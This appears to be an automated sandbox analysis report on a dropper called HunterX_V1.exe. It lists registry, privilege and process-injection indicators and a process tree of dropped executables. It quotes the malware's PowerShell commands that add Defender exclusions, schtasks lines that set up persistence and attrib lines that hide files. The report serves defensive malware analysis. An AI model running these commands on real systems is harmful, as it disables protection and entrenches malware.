description ioc Process File created C:\Windows\Installer\e57e407.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\{510D81D1-0604-41EF-B418-74033C360C14}\Match_Details.exe msiexec.exe File created C:\Windows\Installer\{510D81D1-0604-41EF-B418-74033C360C14}\Match_Details.exe msiexec.exe File opened for modification C:\Windows\Installer\MSIE521.tmp msiexec.exe File created C:\Windows\Installer\{510D81D1-0604-41EF-B418-74033C360C14}\HunterX_V1.exe msiexec.exe File opened for modification C:\Windows\Installer\{510D81D1-0604-41EF-B418-74033C360C14}\HunterX_V1.exe msiexec.exe File created C:\Windows\Installer\SourceHash{510D81D1-0604-41EF-B418-74033C360C14} msiexec.exe File opened for modification C:\Windows\Installer\MSIE810.tmp msiexec.exe File created C:\Windows\Installer\e57e409.msi msiexec.exe File opened for modification C:\Windows\Installer\e57e407.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIE4C2.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Carnom Cracker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HunterX_V1.exe -
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x0007000000023c7e-49.dat nsis_installer_1 behavioral1/files/0x0007000000023c7e-49.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000e3c1c56297b3270b0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000e3c1c5620000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900e3c1c562000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1de3c1c562000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000e3c1c56200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2540 timeout.exe 5080 timeout.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe -
Modifies registry class 25 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D18D0154060FE144B814730C363C041\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D18D0154060FE144B814730C363C041\InstanceType = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D18D0154060FE144B814730C363C041\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D18D0154060FE144B814730C363C041\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D18D0154060FE144B814730C363C041\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings HunterX_V1.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\1D18D0154060FE144B814730C363C041\MainFeature msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D18D0154060FE144B814730C363C041\Version = "16777219" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\19CBC9AF2164DDD4E928D467B1820DAC msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D18D0154060FE144B814730C363C041\SourceList\Media\DiskPrompt = "[1]" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D18D0154060FE144B814730C363C041\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D18D0154060FE144B814730C363C041\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D18D0154060FE144B814730C363C041\PackageCode = "99F5DACE5E269A740AD1F807E428D918" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D18D0154060FE144B814730C363C041\ProductIcon = "C:\\Windows\\Installer\\{510D81D1-0604-41EF-B418-74033C360C14}\\HunterX_V1.exe" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\19CBC9AF2164DDD4E928D467B1820DAC\1D18D0154060FE144B814730C363C041 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D18D0154060FE144B814730C363C041\SourceList msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\1D18D0154060FE144B814730C363C041 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D18D0154060FE144B814730C363C041 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D18D0154060FE144B814730C363C041\ProductName = "HunterX" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D18D0154060FE144B814730C363C041\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D18D0154060FE144B814730C363C041\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D18D0154060FE144B814730C363C041\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D18D0154060FE144B814730C363C041\SourceList\PackageName = "Setup_HunterX_V1.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D18D0154060FE144B814730C363C041\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D18D0154060FE144B814730C363C041\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4280 schtasks.exe 3096 schtasks.exe 5276 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
pid Process 3212 winlogoc.exe 2852 Setup.exe 852 S444.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3832 syss.exe 3832 syss.exe 3832 syss.exe 3832 syss.exe 3832 syss.exe 3832 syss.exe 3832 syss.exe 3832 syss.exe 3832 syss.exe 3832 syss.exe 3832 syss.exe 3832 syss.exe 3832 syss.exe 3832 syss.exe 3832 syss.exe 3832 syss.exe 3832 syss.exe 3832 syss.exe 3832 syss.exe 3832 syss.exe 3832 syss.exe 3832 syss.exe 3832 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 932 syss.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 1968 powershell.exe 1968 powershell.exe 1968 powershell.exe 888 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3212 winlogoc.exe Token: SeDebugPrivilege 2852 Setup.exe Token: SeShutdownPrivilege 1792 msiexec.exe Token: SeIncreaseQuotaPrivilege 1792 msiexec.exe Token: SeDebugPrivilege 1644 Setup.exe Token: SeDebugPrivilege 3832 syss.exe Token: SeDebugPrivilege 3812 winlogoc.exe Token: SeSecurityPrivilege 2656 msiexec.exe Token: SeCreateTokenPrivilege 1792 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1792 msiexec.exe Token: SeLockMemoryPrivilege 1792 msiexec.exe Token: SeIncreaseQuotaPrivilege 1792 msiexec.exe Token: SeMachineAccountPrivilege 1792 msiexec.exe Token: SeTcbPrivilege 1792 msiexec.exe Token: SeSecurityPrivilege 1792 msiexec.exe Token: SeTakeOwnershipPrivilege 1792 msiexec.exe Token: SeLoadDriverPrivilege 1792 msiexec.exe Token: SeSystemProfilePrivilege 1792 msiexec.exe Token: SeSystemtimePrivilege 1792 msiexec.exe Token: SeProfSingleProcessPrivilege 1792 msiexec.exe Token: SeIncBasePriorityPrivilege 1792 msiexec.exe Token: SeCreatePagefilePrivilege 1792 msiexec.exe Token: SeCreatePermanentPrivilege 1792 msiexec.exe Token: SeBackupPrivilege 1792 msiexec.exe Token: SeRestorePrivilege 1792 msiexec.exe Token: SeShutdownPrivilege 1792 msiexec.exe Token: SeDebugPrivilege 1792 msiexec.exe Token: SeAuditPrivilege 1792 msiexec.exe Token: SeSystemEnvironmentPrivilege 1792 msiexec.exe Token: SeChangeNotifyPrivilege 1792 msiexec.exe Token: SeRemoteShutdownPrivilege 1792 msiexec.exe Token: SeUndockPrivilege 1792 msiexec.exe Token: SeSyncAgentPrivilege 1792 msiexec.exe Token: SeEnableDelegationPrivilege 1792 msiexec.exe Token: SeManageVolumePrivilege 1792 msiexec.exe Token: SeImpersonatePrivilege 1792 msiexec.exe Token: SeCreateGlobalPrivilege 1792 msiexec.exe Token: SeDebugPrivilege 4240 Setup.exe Token: SeDebugPrivilege 2800 winlogoc.exe Token: SeCreateTokenPrivilege 1792 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1792 msiexec.exe Token: SeLockMemoryPrivilege 1792 msiexec.exe Token: SeIncreaseQuotaPrivilege 1792 msiexec.exe Token: SeMachineAccountPrivilege 1792 msiexec.exe Token: SeTcbPrivilege 1792 msiexec.exe Token: SeSecurityPrivilege 1792 msiexec.exe Token: SeTakeOwnershipPrivilege 1792 msiexec.exe Token: SeLoadDriverPrivilege 1792 msiexec.exe Token: SeSystemProfilePrivilege 1792 msiexec.exe Token: SeSystemtimePrivilege 1792 msiexec.exe Token: SeProfSingleProcessPrivilege 1792 msiexec.exe Token: SeIncBasePriorityPrivilege 1792 msiexec.exe Token: SeCreatePagefilePrivilege 1792 msiexec.exe Token: SeCreatePermanentPrivilege 1792 msiexec.exe Token: SeBackupPrivilege 1792 msiexec.exe Token: SeRestorePrivilege 1792 msiexec.exe Token: SeShutdownPrivilege 1792 msiexec.exe Token: SeDebugPrivilege 1792 msiexec.exe Token: SeAuditPrivilege 1792 msiexec.exe Token: SeSystemEnvironmentPrivilege 1792 msiexec.exe Token: SeChangeNotifyPrivilege 1792 msiexec.exe Token: SeRemoteShutdownPrivilege 1792 msiexec.exe Token: SeUndockPrivilege 1792 msiexec.exe Token: SeSyncAgentPrivilege 1792 msiexec.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1792 msiexec.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2852 Setup.exe 6004 syss.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1888 wrote to memory of 3264 1888 HunterX_V1.exe 83 PID 1888 wrote to memory of 3264 1888 HunterX_V1.exe 83 PID 1888 wrote to memory of 3264 1888 HunterX_V1.exe 83 PID 1888 wrote to memory of 2852 1888 HunterX_V1.exe 84 PID 1888 wrote to memory of 2852 1888 HunterX_V1.exe 84 PID 1888 wrote to memory of 3212 1888 HunterX_V1.exe 85 PID 1888 wrote to memory of 3212 1888 HunterX_V1.exe 85 PID 1888 wrote to memory of 1792 1888 HunterX_V1.exe 86 PID 1888 wrote to memory of 1792 1888 HunterX_V1.exe 86 PID 1888 wrote to memory of 1792 1888 HunterX_V1.exe 86 PID 1888 wrote to memory of 2080 1888 HunterX_V1.exe 87 PID 1888 wrote to memory of 2080 1888 HunterX_V1.exe 87 PID 1888 wrote to memory of 2080 1888 HunterX_V1.exe 87 PID 2080 wrote to memory of 3832 2080 Carnom Cracker.exe 88 PID 2080 wrote to memory of 3832 2080 Carnom Cracker.exe 88 PID 2080 wrote to memory of 216 2080 Carnom Cracker.exe 89 PID 2080 wrote to memory of 216 2080 Carnom Cracker.exe 89 PID 2080 wrote to memory of 216 2080 Carnom Cracker.exe 89 PID 2080 wrote to memory of 1644 2080 Carnom Cracker.exe 156 PID 2080 wrote to memory of 1644 2080 Carnom Cracker.exe 156 PID 2080 wrote to memory of 3812 2080 Carnom Cracker.exe 92 PID 2080 wrote to memory of 3812 2080 Carnom Cracker.exe 92 PID 2080 wrote to memory of 2092 2080 Carnom Cracker.exe 93 PID 2080 wrote to memory of 2092 2080 Carnom Cracker.exe 93 PID 2080 wrote to memory of 2092 2080 Carnom Cracker.exe 93 PID 2092 wrote to memory of 4020 2092 Carnom Cracker.exe 95 PID 2092 wrote to memory of 4020 2092 Carnom Cracker.exe 95 PID 2092 wrote to memory of 1416 2092 Carnom Cracker.exe 96 PID 2092 wrote to memory of 1416 2092 Carnom Cracker.exe 96 PID 2092 wrote to memory of 1416 2092 Carnom Cracker.exe 96 PID 2092 wrote to memory of 4240 2092 Carnom Cracker.exe 97 PID 2092 wrote to memory of 4240 2092 Carnom Cracker.exe 97 PID 2092 wrote to memory of 2800 2092 Carnom Cracker.exe 98 PID 2092 wrote to memory of 2800 2092 Carnom Cracker.exe 98 PID 2092 wrote to memory of 4664 2092 Carnom Cracker.exe 100 PID 2092 wrote to memory of 4664 2092 Carnom Cracker.exe 100 PID 2092 wrote to memory of 4664 2092 Carnom Cracker.exe 100 PID 2656 wrote to memory of 3596 2656 msiexec.exe 101 PID 2656 wrote to memory of 3596 2656 msiexec.exe 101 PID 2656 wrote to memory of 3596 2656 msiexec.exe 101 PID 4664 wrote to memory of 2424 4664 Carnom Cracker.exe 102 PID 4664 wrote to memory of 2424 4664 Carnom Cracker.exe 102 PID 4664 wrote to memory of 3952 4664 Carnom Cracker.exe 103 PID 4664 wrote to memory of 3952 4664 Carnom Cracker.exe 103 PID 4664 wrote to memory of 3952 4664 Carnom Cracker.exe 103 PID 4664 wrote to memory of 1840 4664 Carnom Cracker.exe 104 PID 4664 wrote to memory of 1840 4664 Carnom Cracker.exe 104 PID 4664 wrote to memory of 4668 4664 Carnom Cracker.exe 105 PID 4664 wrote to memory of 4668 4664 Carnom Cracker.exe 105 PID 4664 wrote to memory of 320 4664 Carnom Cracker.exe 106 PID 4664 wrote to memory of 320 4664 Carnom Cracker.exe 106 PID 4664 wrote to memory of 320 4664 Carnom Cracker.exe 106 PID 3832 wrote to memory of 4196 3832 syss.exe 107 PID 3832 wrote to memory of 4196 3832 syss.exe 107 PID 320 wrote to memory of 932 320 Carnom Cracker.exe 109 PID 320 wrote to memory of 932 320 Carnom Cracker.exe 109 PID 3832 wrote to memory of 4968 3832 syss.exe 110 PID 3832 wrote to memory of 4968 3832 syss.exe 110 PID 320 wrote to memory of 852 320 Carnom Cracker.exe 111 PID 320 wrote to memory of 852 320 Carnom Cracker.exe 111 PID 320 wrote to memory of 852 320 Carnom Cracker.exe 111 PID 320 wrote to memory of 452 320 Carnom Cracker.exe 112 PID 320 wrote to memory of 452 320 Carnom Cracker.exe 112 PID 320 wrote to memory of 1044 320 Carnom Cracker.exe 114 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 5280 attrib.exe 1420 attrib.exe 1336 attrib.exe 4196 attrib.exe 4968 attrib.exe 4316 attrib.exe 5744 attrib.exe 5884 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\HunterX_V1.exe"C:\Users\Admin\AppData\Local\Temp\HunterX_V1.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:3264 -
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\S444.exe"3⤵
- System Location Discovery: System Language Discovery
PID:5772 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\S444.exe"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5280
-
-
-
C:\System32\$77-System32.exe"C:\System32\$77-System32.exe"3⤵PID:3424
-
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Setup.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Setup.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\systempu.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systempu.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:5508
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "systempu" /tr "C:\ProgramData\systempu.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3096
-
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
PID:3212 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Interrupi" /tr "C:\Users\Admin\AppData\Local\Interrupi.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4280
-
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\Setup_HunterX_V1.msi"2⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1792
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft ACPI Driverc"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4196
-
-
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft ACPI Driverc\$77Microsoft ACPI Driverc.exe"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4968
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEBE6.tmp.bat""4⤵PID:440
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:2540
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:216
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1644
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3812
-
-
